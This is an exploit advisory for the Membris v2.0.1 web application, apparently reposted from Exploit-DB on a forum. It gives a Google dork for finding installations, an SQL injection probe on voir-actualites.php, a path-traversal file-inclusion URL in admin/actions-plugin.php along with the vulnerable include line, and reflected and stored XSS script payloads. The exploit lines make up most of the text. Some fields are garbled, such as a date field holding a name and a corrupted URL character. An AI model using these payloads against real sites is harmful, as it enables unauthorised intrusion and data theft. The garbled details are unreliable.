Membris v 2.0.1 Sql \ XSS &文件暴露
# Exploit:Membris v 2.0.1 Sql \ XSS & 文件暴露# Google Dork: Powered by Membris v 2.0.1
# Date: Dr.abolalh
# Version: Membris v 2.0.1
###################################
# Exploit-DB Note:
# Application also suffers from
# stored XSS in the messaging system.
# Insert <script>alert('xss');</script>
# in the message body.
SQL:
voir-actualites.php
Exploit:
voir-actualites.php?idn=1 '
+-----------------------------------------------------------+
File Inclusion
include ("../plugins/" . $_GET['acces'] . "/fonctions.php");
Exploit:
admin/actions-plugin.php�acces=../index.php
+-----------------------------------------------------------+
XSS
search.php
Exploit:
search.php?req= XSS
search.php?req='--></style></script><script>alert(0x0002BC)</script>
+-----------------------------------------------------------+
页:
[1]